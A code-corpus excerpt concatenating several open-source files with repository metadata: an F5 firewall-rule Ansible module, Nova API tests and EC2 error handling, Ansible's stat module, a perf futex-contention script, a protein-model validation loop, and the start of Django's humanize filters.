transform_name(self.want.partition, self.want.parent_rule_list),
self.want.name
)
resp = self.client.api.get(uri)
if resp.ok:
return True
return False
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def remove(self):
if self.module.check_mode:
return True
self.remove_from_device()
if self.exists():
raise F5ModuleError("Failed to delete the resource.")
return True
def create(self):
self._set_changed_options()
if self.want.rule_list is None and self.want.parent_rule_list is None:
if self.want.action is None:
self.changes.update({'action': 'reject'})
if self.want.logging is None:
self.changes.update({'logging': False})
if self.want.status is None:
self.changes.update({'status': 'enabled'})
if self.want.status == 'scheduled' and self.want.schedule is None:
raise F5ModuleError(
"A 'schedule' must be specified when 'status' is 'scheduled'."
)
if self.module.check_mode:
return True
self.create_on_device()
return True
def create_on_device(self):
params = self.changes.api_params()
params['name'] = self.want.name
params['partition'] = self.want.partition
params['placeAfter'] = 'last'
if self.want.parent_policy:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/policy/{2}/rules/".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_policy),
)
else:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/rule-list/{2}/rules/".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_rule_list),
)
if self.changes.protocol not in ['icmp', 'icmpv6']:
if self.changes.icmp_message is not None:
raise F5ModuleError(
"The 'icmp_message' can only be specified when 'protocol' is 'icmp' or 'icmpv6'."
)
resp = self.client.api.post(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] in [400, 403]:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def update_on_device(self):
if self.want.parent_policy:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/policy/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_policy),
self.want.name
)
else:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/rule-list/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_rule_list),
self.want.name
)
if self.have.protocol not in ['icmp', 'icmpv6'] and self.changes.protocol not in ['icmp', 'icmpv6']:
if self.changes.icmp_message is not None:
raise F5ModuleError(
"The 'icmp_message' can only be specified when 'protocol' is 'icmp' or 'icmpv6'."
)
if self.changes.protocol in ['icmp', 'icmpv6']:
self.changes.update({'source': {}})
self.changes.update({'destination': {}})
params = self.changes.api_params()
resp = self.client.api.patch(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def absent(self):
if self.exists():
return self.remove()
return False
def remove_from_device(self):
if self.want.parent_policy:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/policy/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_policy),
self.want.name
)
else:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/rule-list/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_rule_list),
self.want.name
)
resp = self.client.api.delete(uri)
if resp.status == 200:
return True
def read_current_from_device(self):
if self.want.parent_policy:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/policy/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_policy),
self.want.name
)
else:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/rule-list/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_rule_list),
self.want.name
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return ApiParameters(params=response)
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
argument_spec = dict(
name=dict(required=True),
parent_policy=dict(),
parent_rule_list=dict(),
logging=dict(type='bool'),
protocol=dict(),
irule=dict(),
description=dict(),
source=dict(
type='list',
elements='dict',
options=dict(
address=dict(),
address_list=dict(),
address_range=dict(),
country=dict(),
port=dict(type='int'),
port_list=dict(),
port_range=dict(),
vlan=dict(),
),
mutually_exclusive=[[
'address', 'address_list', 'address_range', 'country', 'vlan',
'port', 'port_range', 'port_list'
]]
),
destination=dict(
type='list',
elements='dict',
options=dict(
address=dict(),
address_list=dict(),
address_range=dict(),
country=dict(),
port=dict(type='int'),
port_list=dict(),
port_range=dict(),
),
mutually_exclusive=[[
'address', 'address_list', 'address_range', 'country',
'port', 'port_range', 'port_list'
]]
),
action=dict(
choices=['accept', 'drop', 'reject', 'accept-decisively']
),
status=dict(
choices=['enabled', 'disabled', 'scheduled']
),
schedule=dict(),
rule_list=dict(),
icmp_message=dict(
type='list',
elements='dict',
options=dict(
type=dict(),
code=dict(),
)
),
partition=dict(
default='Common',
fallback=(env_fallback, ['F5_PARTITION'])
),
state=dict(
default='present',
choices=['present', 'absent']
)
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
self.mutually_exclusive = [
['rule_list', 'action'],
['rule_list', 'source'],
['rule_list', 'destination'],
['rule_list', 'irule'],
['rule_list', 'protocol'],
['rule_list', 'logging'],
['parent_policy', 'parent_rule_list']
]
self.required_one_of = [
['parent_policy', 'parent_rule_list']
]
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode,
mutually_exclusive=spec.mutually_exclusive,
required_one_of=spec.required_one_of
)
client = F5RestClient(**module.params)
try:
mm = ModuleManager(module=module, client=client)
results = mm.exec_module()
cleanup_tokens(client)
exit_json(module, results, client)
except F5ModuleError as ex:
cleanup_tokens(client)
fail_json(module, ex, client)
if __name__ == '__main__':
main()
|
gpl-3.0
|
klmitch/nova
|
nova/tests/functional/api_sample_tests/test_floating_ip_dns.py
|
6
|
3195
|
# Copyright 2014 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.tests.functional.api import client as api_client
from nova.tests.functional.api_sample_tests import api_sample_base
class FloatingIpDNSTest(api_sample_base.ApiSampleTestBaseV21):
ADMIN_API = True
def test_floating_ip_dns_list(self):
ex = self.assertRaises(api_client.OpenStackApiException,
self.api.api_get,
'os-floating-ip-dns')
self.assertEqual(410, ex.response.status_code)
def test_floating_ip_dns_create_or_update(self):
ex = self.assertRaises(api_client.OpenStackApiException,
self.api.api_put,
'os-floating-ip-dns/domain1.example.org',
{'project': 'project1',
'scope': 'public'})
self.assertEqual(410, ex.response.status_code)
def test_floating_ip_dns_delete(self):
ex = self.assertRaises(api_client.OpenStackApiException,
self.api.api_delete,
'os-floating-ip-dns/domain1.example.org')
self.assertEqual(410, ex.response.status_code)
def test_floating_ip_dns_create_or_update_entry(self):
url = 'os-floating-ip-dns/domain1.example.org/entries/instance1'
ex = self.assertRaises(api_client.OpenStackApiException,
self.api.api_put,
url,
{'ip': '192.168.1.1',
'dns_type': 'A'})
self.assertEqual(410, ex.response.status_code)
def test_floating_ip_dns_entry_get(self):
url = 'os-floating-ip-dns/domain1.example.org/entries/instance1'
ex = self.assertRaises(api_client.OpenStackApiException,
self.api.api_get,
url)
self.assertEqual(410, ex.response.status_code)
def test_floating_ip_dns_entry_delete(self):
url = 'os-floating-ip-dns/domain1.example.org/entries/instance1'
ex = self.assertRaises(api_client.OpenStackApiException,
self.api.api_delete,
url)
self.assertEqual(410, ex.response.status_code)
def test_floating_ip_dns_entry_list(self):
url = 'os-floating-ip-dns/domain1.example.org/entries/192.168.1.1'
ex = self.assertRaises(api_client.OpenStackApiException,
self.api.api_get,
url)
self.assertEqual(410, ex.response.status_code)
|
apache-2.0
|
Tatsh-ansible/ansible
|
lib/ansible/modules/files/stat.py
|
13
|
19405
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = r'''
---
module: stat
version_added: "1.3"
short_description: Retrieve file or file system status
description:
- Retrieves facts for a file similar to the linux/unix 'stat' command.
- For Windows targets, use the M(win_stat) module instead.
options:
path:
description:
- The full path of the file/object to get the facts of.
required: true
follow:
description:
- Whether to follow symlinks.
choices: [ 'no', 'yes' ]
default: 'no'
get_md5:
description:
- Whether to return the md5 sum of the file.
- Will return None if not a regular file or if we're
unable to use md5 (Common for FIPS-140 compliant systems).
choices: [ 'no', 'yes' ]
default: 'yes'
get_checksum:
description:
- Whether to return a checksum of the file (default sha1).
choices: [ 'no', 'yes' ]
default: 'yes'
version_added: "1.8"
checksum_algorithm:
description:
- Algorithm to determine checksum of file. Will throw an error if the
host is unable to use specified algorithm.
choices: [ sha1, sha224, sha256, sha384, sha512 ]
default: sha1
aliases: [ checksum, checksum_algo ]
version_added: "2.0"
get_mime:
description:
- Use file magic and return data about the nature of the file. this uses
the 'file' utility found on most Linux/Unix systems.
- This will add both `mime_type` and 'charset' fields to the return, if possible.
- In 2.3 this option changed from 'mime' to 'get_mime' and the default changed to 'Yes'.
choices: [ 'no', 'yes' ]
default: 'yes'
version_added: "2.1"
aliases: [ mime, mime_type, mime-type ]
get_attributes:
description:
- Get file attributes using lsattr tool if present.
choices: [ 'no', 'yes' ]
default: 'yes'
version_added: "2.3"
aliases: [ attr, attributes ]
notes:
- For Windows targets, use the M(win_stat) module instead.
author: Bruce Pennypacker (@bpennypacker)
'''
EXAMPLES = '''
# Obtain the stats of /etc/foo.conf, and check that the file still belongs
# to 'root'. Fail otherwise.
- stat:
path: /etc/foo.conf
register: st
- fail:
msg: "Whoops! file ownership has changed"
when: st.stat.pw_name != 'root'
# Determine if a path exists and is a symlink. Note that if the path does
# not exist, and we test sym.stat.islnk, it will fail with an error. So
# therefore, we must test whether it is defined.
# Run this to understand the structure, the skipped ones do not pass the
# check performed by 'when'
- stat:
path: /path/to/something
register: sym
- debug:
msg: "islnk isn't defined (path doesn't exist)"
when: sym.stat.islnk is not defined
- debug:
msg: "islnk is defined (path must exist)"
when: sym.stat.islnk is defined
- debug:
msg: "Path exists and is a symlink"
when: sym.stat.islnk is defined and sym.stat.islnk
- debug:
msg: "Path exists and isn't a symlink"
when: sym.stat.islnk is defined and sym.stat.islnk == False
# Determine if a path exists and is a directory. Note that we need to test
# both that p.stat.isdir actually exists, and also that it's set to true.
- stat:
path: /path/to/something
register: p
- debug:
msg: "Path exists and is a directory"
when: p.stat.isdir is defined and p.stat.isdir
# Don't do md5 checksum
- stat:
path: /path/to/myhugefile
get_md5: no
# Use sha256 to calculate checksum
- stat:
path: /path/to/something
checksum_algorithm: sha256
'''
RETURN = r'''
stat:
description: dictionary containing all the stat data, some platforms might add additional fields
returned: success
type: complex
contains:
exists:
description: if the destination path actually exists or not
returned: success
type: boolean
sample: True
path:
description: The full path of the file/object to get the facts of
returned: success and if path exists
type: string
sample: '/path/to/file'
mode:
description: Unix permissions of the file in octal
returned: success, path exists and user can read stats
type: octal
sample: 1755
isdir:
description: Tells you if the path is a directory
returned: success, path exists and user can read stats
type: boolean
sample: False
ischr:
description: Tells you if the path is a character device
returned: success, path exists and user can read stats
type: boolean
sample: False
isblk:
description: Tells you if the path is a block device
returned: success, path exists and user can read stats
type: boolean
sample: False
isreg:
description: Tells you if the path is a regular file
returned: success, path exists and user can read stats
type: boolean
sample: True
isfifo:
description: Tells you if the path is a named pipe
returned: success, path exists and user can read stats
type: boolean
sample: False
islnk:
description: Tells you if the path is a symbolic link
returned: success, path exists and user can read stats
type: boolean
sample: False
issock:
description: Tells you if the path is a unix domain socket
returned: success, path exists and user can read stats
type: boolean
sample: False
uid:
description: Numeric id representing the file owner
returned: success, path exists and user can read stats
type: int
sample: 1003
gid:
description: Numeric id representing the group of the owner
returned: success, path exists and user can read stats
type: int
sample: 1003
size:
description: Size in bytes for a plain file, amount of data for some special files
returned: success, path exists and user can read stats
type: int
sample: 203
inode:
description: Inode number of the path
returned: success, path exists and user can read stats
type: int
sample: 12758
dev:
description: Device the inode resides on
returned: success, path exists and user can read stats
type: int
sample: 33
nlink:
description: Number of links to the inode (hard links)
returned: success, path exists and user can read stats
type: int
sample: 1
atime:
description: Time of last access
returned: success, path exists and user can read stats
type: float
sample: 1424348972.575
mtime:
description: Time of last modification
returned: success, path exists and user can read stats
type: float
sample: 1424348972.575
ctime:
description: Time of last metadata update or creation (depends on OS)
returned: success, path exists and user can read stats
type: float
sample: 1424348972.575
wusr:
description: Tells you if the owner has write permission
returned: success, path exists and user can read stats
type: boolean
sample: True
rusr:
description: Tells you if the owner has read permission
returned: success, path exists and user can read stats
type: boolean
sample: True
xusr:
description: Tells you if the owner has execute permission
returned: success, path exists and user can read stats
type: boolean
sample: True
wgrp:
description: Tells you if the owner's group has write permission
returned: success, path exists and user can read stats
type: boolean
sample: False
rgrp:
description: Tells you if the owner's group has read permission
returned: success, path exists and user can read stats
type: boolean
sample: True
xgrp:
description: Tells you if the owner's group has execute permission
returned: success, path exists and user can read stats
type: boolean
sample: True
woth:
description: Tells you if others have write permission
returned: success, path exists and user can read stats
type: boolean
sample: False
roth:
description: Tells you if others have read permission
returned: success, path exists and user can read stats
type: boolean
sample: True
xoth:
description: Tells you if others have execute permission
returned: success, path exists and user can read stats
type: boolean
sample: True
isuid:
description: Tells you if the invoking user's id matches the owner's id
returned: success, path exists and user can read stats
type: boolean
sample: False
isgid:
description: Tells you if the invoking user's group id matches the owner's group id
returned: success, path exists and user can read stats
type: boolean
sample: False
lnk_source:
description: Target of the symlink normalized for the remote filesystem
returned: success, path exists and user can read stats and the path is a symbolic link
type: string
sample: /home/foobar/21102015-1445431274-908472971
lnk_target:
description: Target of the symlink. Note that relative paths remain relative
returned: success, path exists and user can read stats and the path is a symbolic link
type: string
sample: ../foobar/21102015-1445431274-908472971
version_added: 2.4
md5:
description: md5 hash of the path
returned: success, path exists and user can read stats and path
supports hashing and md5 is supported
type: string
sample: f88fa92d8cf2eeecf4c0a50ccc96d0c0
checksum:
description: hash of the path
returned: success, path exists, user can read stats, path supports
hashing and supplied checksum algorithm is available
type: string
sample: 50ba294cdf28c0d5bcde25708df53346825a429f
pw_name:
description: User name of owner
returned: success, path exists and user can read stats and installed python supports it
type: string
sample: httpd
gr_name:
description: Group name of owner
returned: success, path exists and user can read stats and installed python supports it
type: string
sample: www-data
mime_type:
description: file magic data or mime-type
returned: success, path exists and user can read stats and
installed python supports it and the `mime` option was true, will
return 'unknown' on error.
type: string
sample: PDF document, version 1.2
charset:
description: file character set or encoding
returned: success, path exists and user can read stats and
installed python supports it and the `mime` option was true, will
return 'unknown' on error.
type: string
sample: us-ascii
readable:
description: Tells you if the invoking user has the right to read the path
returned: success, path exists and user can read the path
type: boolean
sample: False
version_added: 2.2
writeable:
description: Tells you if the invoking user has the right to write the path
returned: success, path exists and user can write the path
type: boolean
sample: False
version_added: 2.2
executable:
description: Tells you if the invoking user has the execute the path
returned: success, path exists and user can execute the path
type: boolean
sample: False
version_added: 2.2
attributes:
description: list of file attributes
returned: success, path exists and user can execute the path
type: list
sample: [ immutable, extent ]
version_added: 2.3
'''
import errno
import grp
import os
import pwd
import stat
# import module snippets
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.pycompat24 import get_exception
from ansible.module_utils._text import to_bytes
def format_output(module, path, st):
mode = st.st_mode
# back to ansible
output = dict(
exists=True,
path=path,
mode="%04o" % stat.S_IMODE(mode),
isdir=stat.S_ISDIR(mode),
ischr=stat.S_ISCHR(mode),
isblk=stat.S_ISBLK(mode),
isreg=stat.S_ISREG(mode),
isfifo=stat.S_ISFIFO(mode),
islnk=stat.S_ISLNK(mode),
issock=stat.S_ISSOCK(mode),
uid=st.st_uid,
gid=st.st_gid,
size=st.st_size,
inode=st.st_ino,
dev=st.st_dev,
nlink=st.st_nlink,
atime=st.st_atime,
mtime=st.st_mtime,
ctime=st.st_ctime,
wusr=bool(mode & stat.S_IWUSR),
rusr=bool(mode & stat.S_IRUSR),
xusr=bool(mode & stat.S_IXUSR),
wgrp=bool(mode & stat.S_IWGRP),
rgrp=bool(mode & stat.S_IRGRP),
xgrp=bool(mode & stat.S_IXGRP),
woth=bool(mode & stat.S_IWOTH),
roth=bool(mode & stat.S_IROTH),
xoth=bool(mode & stat.S_IXOTH),
isuid=bool(mode & stat.S_ISUID),
isgid=bool(mode & stat.S_ISGID),
)
# Platform dependent flags:
for other in [
# Some Linux
('st_blocks', 'blocks'),
('st_blksize', 'block_size'),
('st_rdev', 'device_type'),
('st_flags', 'flags'),
# Some Berkley based
('st_gen', 'generation'),
('st_birthtime', 'birthtime'),
# RISCOS
('st_ftype', 'file_type'),
('st_attrs', 'attrs'),
('st_obtype', 'object_type'),
# OS X
('st_rsize', 'real_size'),
('st_creator', 'creator'),
('st_type', 'file_type'),
]:
if hasattr(st, other[0]):
output[other[1]] = getattr(st, other[0])
return output
def main():
module = AnsibleModule(
argument_spec=dict(
path=dict(required=True, type='path'),
follow=dict(type='bool', default='no'),
get_md5=dict(type='bool', default='yes'),
get_checksum=dict(type='bool', default='yes'),
get_mime=dict(type='bool', default='yes', aliases=['mime', 'mime_type', 'mime-type']),
get_attributes=dict(type='bool', default='yes', aliases=['attr', 'attributes']),
checksum_algorithm=dict(type='str', default='sha1',
choices=['sha1', 'sha224', 'sha256', 'sha384', 'sha512'],
aliases=['checksum', 'checksum_algo']),
),
supports_check_mode=True,
)
path = module.params.get('path')
b_path = to_bytes(path, errors='surrogate_or_strict')
follow = module.params.get('follow')
get_mime = module.params.get('get_mime')
get_attr = module.params.get('get_attributes')
get_md5 = module.params.get('get_md5')
get_checksum = module.params.get('get_checksum')
checksum_algorithm = module.params.get('checksum_algorithm')
# main stat data
try:
if follow:
st = os.stat(b_path)
else:
st = os.lstat(b_path)
except OSError:
e = get_exception()
if e.errno == errno.ENOENT:
output = {'exists': False}
module.exit_json(changed=False, stat=output)
module.fail_json(msg=e.strerror)
# process base results
output = format_output(module, path, st)
# resolved permissions
for perm in [('readable', os.R_OK), ('writeable', os.W_OK), ('executable', os.X_OK)]:
output[perm[0]] = os.access(b_path, perm[1])
# symlink info
if output.get('islnk'):
output['lnk_source'] = os.path.realpath(b_path)
output['lnk_target'] = os.readlink(b_path)
try: # user data
pw = pwd.getpwuid(st.st_uid)
output['pw_name'] = pw.pw_name
except:
pass
try: # group data
grp_info = grp.getgrgid(st.st_gid)
output['gr_name'] = grp_info.gr_name
except:
pass
# checksums
if output.get('isreg') and output.get('readable'):
if get_md5:
# Will fail on FIPS-140 compliant systems
try:
output['md5'] = module.md5(b_path)
except ValueError:
output['md5'] = None
if get_checksum:
output['checksum'] = module.digest_from_file(b_path, checksum_algorithm)
# try to get mime data if requested
if get_mime:
output['mimetype'] = output['charset'] = 'unknown'
mimecmd = module.get_bin_path('file')
if mimecmd:
mimecmd = [mimecmd, '-i', b_path]
try:
rc, out, err = module.run_command(mimecmd)
if rc == 0:
mimetype, charset = out.split(':')[1].split(';')
output['mimetype'] = mimetype.strip()
output['charset'] = charset.split('=')[1].strip()
except:
pass
# try to get attr data
if get_attr:
output['version'] = None
output['attributes'] = []
output['attr_flags'] = ''
out = module.get_file_attributes(b_path)
for x in ('version', 'attributes', 'attr_flags'):
if x in out:
output[x] = out[x]
module.exit_json(changed=False, stat=output)
if __name__ == '__main__':
main()
|
gpl-3.0
|
SlimRoms/kernel_htc_msm8974
|
tools/perf/scripts/python/futex-contention.py
|
11261
|
1486
|
# futex contention
# (c) 2010, Arnaldo Carvalho de Melo <acme@redhat.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Translation of:
#
# http://sourceware.org/systemtap/wiki/WSFutexContention
#
# to perf python scripting.
#
# Measures futex contention
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + '/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Util import *
process_names = {}
thread_thislock = {}
thread_blocktime = {}
lock_waits = {} # long-lived stats on (tid,lock) blockage elapsed time
process_names = {} # long-lived pid-to-execname mapping
def syscalls__sys_enter_futex(event, ctxt, cpu, s, ns, tid, comm,
nr, uaddr, op, val, utime, uaddr2, val3):
cmd = op & FUTEX_CMD_MASK
if cmd != FUTEX_WAIT:
return # we don't care about originators of WAKE events
process_names[tid] = comm
thread_thislock[tid] = uaddr
thread_blocktime[tid] = nsecs(s, ns)
def syscalls__sys_exit_futex(event, ctxt, cpu, s, ns, tid, comm,
nr, ret):
if thread_blocktime.has_key(tid):
elapsed = nsecs(s, ns) - thread_blocktime[tid]
add_stats(lock_waits, (tid, thread_thislock[tid]), elapsed)
del thread_blocktime[tid]
del thread_thislock[tid]
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
for (tid, lock) in lock_waits:
min, max, avg, count = lock_waits[tid, lock]
print "%s[%d] lock %x contended %d times, %d avg ns" % \
(process_names[tid], tid, lock, count, avg)
|
gpl-2.0
|
isaachenrion/jets
|
src/proteins/train/validation.py
|
1
|
1461
|
import logging
import time
import torch
from src.data_ops.wrapping import unwrap
from ..loss import loss
def half_and_half(a,b):
a = torch.stack([torch.triu(x) for x in a], 0)
b = torch.stack([torch.tril(x, diagonal=-1) for x in b], 0)
return a + b
def validation(model, data_loader):
t_valid = time.time()
model.eval()
valid_loss = 0.
yy, yy_pred = [], []
half = []
mask = []
hard_pred = []
for i, batch in enumerate(data_loader):
(x, y, y_mask, batch_mask) = batch
y_pred = model(x, mask=batch_mask)
vl = loss(y_pred, y, y_mask, batch_mask)
valid_loss = valid_loss + float(unwrap(vl))
yy.append(unwrap(y))
yy_pred.append(unwrap(y_pred))
mask.append(unwrap(batch_mask))
half.append(unwrap(half_and_half(y, y_pred)))
hard_pred.append(unwrap(half_and_half(y, (y_pred > 0.5).float())))
del y; del y_pred; del y_mask; del x; del batch_mask; del batch
valid_loss /= len(data_loader)
#grads = torch.cat([p.grad.view(-1) for p in model.parameters() if p.grad is not None], 0)
logdict = dict(
yy=yy,
yy_pred=yy_pred,
half=half,
hard_pred=hard_pred,
mask=mask,
valid_loss=valid_loss,
model=model,
#grads=grads,
)
model.train()
t1=time.time()
logging.info("Validation took {:.1f} seconds".format(time.time() - t_valid))
return logdict
|
bsd-3-clause
|
Francis-Liu/animated-broccoli
|
nova/api/ec2/faults.py
|
61
|
2887
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
import webob.dec
import webob.exc
import nova.api.ec2
from nova import context
from nova import utils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
def ec2_error_response(request_id, code, message, status=500):
"""Helper to construct an EC2 compatible error response."""
LOG.debug('EC2 error response: %(code)s: %(message)s',
{'code': code, 'message': message})
resp = webob.Response()
resp.status = status
resp.headers['Content-Type'] = 'text/xml'
resp.body = str('<?xml version="1.0"?>\n'
'<Response><Errors><Error><Code>%s</Code>'
'<Message>%s</Message></Error></Errors>'
'<RequestID>%s</RequestID></Response>' %
(utils.xhtml_escape(utils.utf8(code)),
utils.xhtml_escape(utils.utf8(message)),
utils.xhtml_escape(utils.utf8(request_id))))
return resp
class Fault(webob.exc.HTTPException):
"""Captures exception and return REST Response."""
def __init__(self, exception):
"""Create a response for the given webob.exc.exception."""
self.wrapped_exc = exception
@webob.dec.wsgify
def __call__(self, req):
"""Generate a WSGI response based on the exception passed to ctor."""
code = nova.api.ec2.exception_to_ec2code(self.wrapped_exc)
status = self.wrapped_exc.status_int
message = self.wrapped_exc.explanation
if status == 501:
message = "The requested function is not supported"
if 'AWSAccessKeyId' not in req.params:
raise webob.exc.HTTPBadRequest()
user_id, _sep, project_id = req.params['AWSAccessKeyId'].partition(':')
project_id = project_id or user_id
remote_address = getattr(req, 'remote_address', '127.0.0.1')
if CONF.use_forwarded_for:
remote_address = req.headers.get('X-Forwarded-For', remote_address)
ctxt = context.RequestContext(user_id,
project_id,
remote_address=remote_address)
resp = ec2_error_response(ctxt.request_id, code,
message=message, status=status)
return resp
|
apache-2.0
|
ghickman/django
|
django/contrib/humanize/templatetags/humanize.py
|
526
|
9442
|
# -*- encoding: utf-8 -*-
from __future__ import unicode_literals
import re
from datetime import date, datetime
from decimal import Decimal
from django import template
from django.conf import settings
from django.template import defaultfilters
from django.utils.encoding import force_text
from django.utils.formats import number_format
from django.utils.safestring import mark_safe
from django.utils.timezone import is_aware, utc
from django.utils.translation import pgettext, ugettext as _, ungettext
register = template.Library()
@register.filter(is_safe=True)
def ordinal(value):
"""
Converts an integer to its ordinal as a string. 1 is '1st', 2 is '2nd',
3 is '3rd', etc. Works for any integer.
"""
try:
value = int(value)
except (TypeError, ValueError):
return value
suffixes = (_('th'), _('st'), _('nd'), _('rd'), _('th'), _('th'), _('th'), _('th'), _('th'), _('th'))
if value % 100 in (11, 12, 13): # special case
return mark_safe("%d%s" % (value, suffixes[0]))
# Mark value safe so i18n does not break with <sup> or <sub> see #19988
return mark_safe("%d%s" % (value, suffixes[value % 10]))
@register.filter(is_safe=True)
def intcomma(value, use_l10n=True):
"""
Converts an integer to a string containing commas every three digits.
For example, 3000 becomes '3,000' and 45000 becomes '45,000'.
"""
if settings.USE_L10N and use_l10n:
try:
if not isinstance(value, (float, Decimal)):
value = int(value)
except (TypeError, ValueError):
return intcomma(value, False)
else:
return number_format(value, force_grouping=True)
orig = force_text(value)
new = re.sub("^(-?\d+)(\d{3})", '\g<1>,\g<2>', orig)
if orig == new:
return new
else:
return intcomma(new, use_l10n)
# A tuple of standard large number to their converters
intword_converters = (
(6, lambda number: (
ungettext('%(value).1f million', '%(value).1f million', number),
ungettext('%(value)s million', '%(value)s million', number),
)),
(9, lambda number: (
ungettext('%(value).1f billion', '%(value).1f billion', number),
ungettext('%(value)s billion', '%(value)s billion', number),
)),
(12, lambda number: (
ungettext('%(value).1f trillion', '%(value).1f trillion', number),
ungettext('%(value)s trillion', '%(value)s trillion', number),
)),
(15, lambda number: (
ungettext('%(value).1f quadrillion', '%(value).1f quadrillion', number),
ungettext('%(value)s quadrillion', '%(value)s quadrillion', number),
)),
(18, lambda number: (
ungettext('%(value).1f quintillion', '%(value).1f quintillion', number),
ungettext('%(value)s quintillion', '%(value)s quintillion', number),
)),
(21, lambda number: (
ungettext('%(value).1f sextillion', '%(value).1f sextillion', number),
ungettext('%(value)s sextillion', '%(value)s sextillion', number),
)),
(24, lambda number: (
ungettext('%(value).1f septillion', '%(value).1f septillion', number),
ungettext('%(value)s septillion', '%(value)s septillion', number),
)),
(27, lambda number: (
ungettext('%(value).1f octillion', '%(value).1f octillion', number),
ungettext('%(value)s octillion', '%(value)s octillion', number),
)),
(30, lambda number: (
ungettext('%(value).1f nonillion', '%(value).1f nonillion', number),
ungettext('%(value)s nonillion', '%(value)s nonillion', number),
)),
(33, lambda number: (
ungettext('%(value).1f decillion', '%(value).1f decillion', number),
ungettext('%(value)s decillion', '%(value)s decillion', number),
)),
(100, lambda number: (
ungettext('%(value).1f googol', '%(value).1f googol', number),
ungettext('%(value)s googol', '%(value)s googol', number),
)),
)
@register.filter(is_safe=False)
def intword(value):
"""
Converts a large integer to a friendly text representation. Works best
for numbers over 1 million. For example, 1000000 becomes '1.0 million',
1200000 becomes '1.2 million' and '1200000000' becomes '1.2 billion'.
"""
try:
value = int(value)
except (TypeError, ValueError):
return value
if value < 1000000:
return value
def _check_for_i18n(value, float_formatted, string_formatted):
"""
Use the i18n enabled defaultfilters.floatformat if possible
"""
if settings.USE_L10N:
value = defaultfilters.floatformat(value, 1)
template = string_formatted
else:
template = float_formatted
return template % {'value': value}
for exponent, converters in intword_converters:
large_number = 10 ** exponent
if value < large_number * 1000:
new_value = value / float(large_number)
return _check_for_i18n(new_value, *converters(new_value))
return value
@register.filter(is_safe=True)
def apnumber(value):
"""
For numbers 1-9, returns the number spelled out. Otherwise, returns the
number. This follows Associated Press style.
"""
try:
value = int(value)
except (TypeError, ValueError):
return value
if not 0 < value < 10:
return value
return (_('one'), _('two'), _('three'), _('four'), _('five'),
_('six'), _('seven'), _('eight'), _('nine'))[value - 1]
# Perform the comparison in the default time zone when USE_TZ = True
# (unless a specific time zone has been applied with the |timezone filter).
@register.filter(expects_localtime=True)
def naturalday(value, arg=None):
"""
For date values that are tomorrow, today or yesterday compared to
present day returns representing string. Otherwise, returns a string
formatted according to settings.DATE_FORMAT.
"""
try:
